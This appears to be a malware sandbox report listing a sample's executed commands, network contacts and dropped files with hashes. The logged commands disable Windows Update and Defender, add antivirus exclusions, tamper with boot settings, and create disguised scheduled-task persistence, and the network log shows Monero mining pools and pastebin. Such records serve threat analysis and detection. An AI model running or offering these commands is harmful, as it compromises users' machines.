C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn NoteUpdateTaskMachineQC /tr "'C:\Program Files\Notepad\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe zuhwtyqtfkk

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Name, VideoProcessor

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Windows\system32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\system32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 us.imgjeoigaa.com udp
HK 103.100.211.218:80 us.imgjeoigaa.com tcp
RU 5.42.65.80:80 5.42.65.80 tcp
DE 45.9.74.80:80 45.9.74.80 tcp
US 8.8.8.8:53 aa.imgjeoogbb.com udp
HK 154.221.26.108:80 aa.imgjeoogbb.com tcp
NL 45.66.230.149:80 45.66.230.149 tcp
NL 45.12.253.56:80 45.12.253.56 tcp
US 8.8.8.8:53 rcn.tuktuk.ug udp
NL 85.209.3.4:11285 rcn.tuktuk.ug tcp
NL 85.209.3.4:11285 rcn.tuktuk.ug tcp
NL 85.209.3.4:11285 rcn.tuktuk.ug tcp
US 8.8.8.8:53 0af2d590-a373-4ee1-9788-7a25104a8b45.uuid.duniadekho.bar udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
US 8.8.8.8:53 server3.duniadekho.bar udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 stun4.l.google.com udp
BG 185.82.216.50:443 server3.duniadekho.bar tcp
JP 172.217.213.127:19302 stun4.l.google.com udp
US 8.8.8.8:53 luckytradeone.com udp
US 104.21.35.252:443 luckytradeone.com tcp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
FR 152.228.216.245:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
NL 51.15.65.182:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 stun1.l.google.com udp
IN 172.253.121.127:19302 stun1.l.google.com udp

Files

memory/1664-54-0x0000000001200000-0x000000000165A000-memory.dmp

\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 61246e63964a1d50af9a3cf9c4e17798
SHA1 098ca418434983f9a4e013127311d14639acea08
SHA256 b768455072e94994ed5f2fc9b02a77640fb81f0dbe2124065d66a60f78cd3f6e
SHA512 bcd472bfbe4b9b498f75ae6e7ea47850ac243eac7c377b94aba3676a0bd32d3e78132a30ffadf51cfa03b0fd33c1743abcedf6517fc48426d85b1d1fe33303b7

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 61246e63964a1d50af9a3cf9c4e17798
SHA1 098ca418434983f9a4e013127311d14639acea08
SHA256 b768455072e94994ed5f2fc9b02a77640fb81f0dbe2124065d66a60f78cd3f6e
SHA512 bcd472bfbe4b9b498f75ae6e7ea47850ac243eac7c377b94aba3676a0bd32d3e78132a30ffadf51cfa03b0fd33c1743abcedf6517fc48426d85b1d1fe33303b7

\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/520-75-0x00000000002F0000-0x00000000002F1000-memory.dmp

\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/1928-84-0x000000013F960000-0x000000013FD1D000-memory.dmp

memory/364-85-0x0000000002C10000-0x0000000002D80000-memory.dmp

memory/364-86-0x0000000002D80000-0x0000000002EB1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

memory/1736-107-0x0000000000250000-0x0000000000276000-memory.dmp

memory/1736-108-0x0000000000280000-0x00000000002C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

MD5 33f958670b421823cb7ec4ba00d501fc
SHA1 2d7d4196f7018b2d52914e268b977c9578cf51a7
SHA256 3e37c392d7e94e4e166148b94684d2e741ca81fe7f7c63bcf046bcfe024446a9
SHA512 750b195db93508716ec6b40c01d0bb9b9b9e5b3bdbc5a8a32fcfd7ffca2a1b91822a4eb12268abe6f55d6a9bdf27bf79cf396a15dc2f14b42c4fdcfa0c559a44

\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

MD5 33f958670b421823cb7ec4ba00d501fc
SHA1 2d7d4196f7018b2d52914e268b977c9578cf51a7
SHA256 3e37c392d7e94e4e166148b94684d2e741ca81fe7f7c63bcf046bcfe024446a9
SHA512 750b195db93508716ec6b40c01d0bb9b9b9e5b3bdbc5a8a32fcfd7ffca2a1b91822a4eb12268abe6f55d6a9bdf27bf79cf396a15dc2f14b42c4fdcfa0c559a44

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

MD5 33f958670b421823cb7ec4ba00d501fc
SHA1 2d7d4196f7018b2d52914e268b977c9578cf51a7
SHA256 3e37c392d7e94e4e166148b94684d2e741ca81fe7f7c63bcf046bcfe024446a9
SHA512 750b195db93508716ec6b40c01d0bb9b9b9e5b3bdbc5a8a32fcfd7ffca2a1b91822a4eb12268abe6f55d6a9bdf27bf79cf396a15dc2f14b42c4fdcfa0c559a44

C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe

MD5 33f958670b421823cb7ec4ba00d501fc
SHA1 2d7d4196f7018b2d52914e268b977c9578cf51a7
SHA256 3e37c392d7e94e4e166148b94684d2e741ca81fe7f7c63bcf046bcfe024446a9
SHA512 750b195db93508716ec6b40c01d0bb9b9b9e5b3bdbc5a8a32fcfd7ffca2a1b91822a4eb12268abe6f55d6a9bdf27bf79cf396a15dc2f14b42c4fdcfa0c559a44

memory/1164-124-0x0000000000240000-0x0000000000312000-memory.dmp

memory/1164-126-0x00000000003E0000-0x00000000003E1000-memory.dmp

memory/1164-125-0x0000000004910000-0x0000000004950000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

memory/1736-137-0x0000000000400000-0x00000000004F3000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

memory/476-161-0x0000000077640000-0x0000000077642000-memory.dmp

memory/476-162-0x0000000077640000-0x0000000077642000-memory.dmp

memory/476-163-0x0000000077640000-0x0000000077642000-memory.dmp

memory/476-167-0x0000000077650000-0x0000000077652000-memory.dmp

memory/2024-168-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2024-166-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/476-169-0x0000000077650000-0x0000000077652000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

memory/476-172-0x0000000077650000-0x0000000077652000-memory.dmp

memory/2024-173-0x0000000000400000-0x0000000000409000-memory.dmp

memory/476-174-0x0000000077660000-0x0000000077662000-memory.dmp

memory/1348-170-0x0000000000220000-0x0000000000229000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

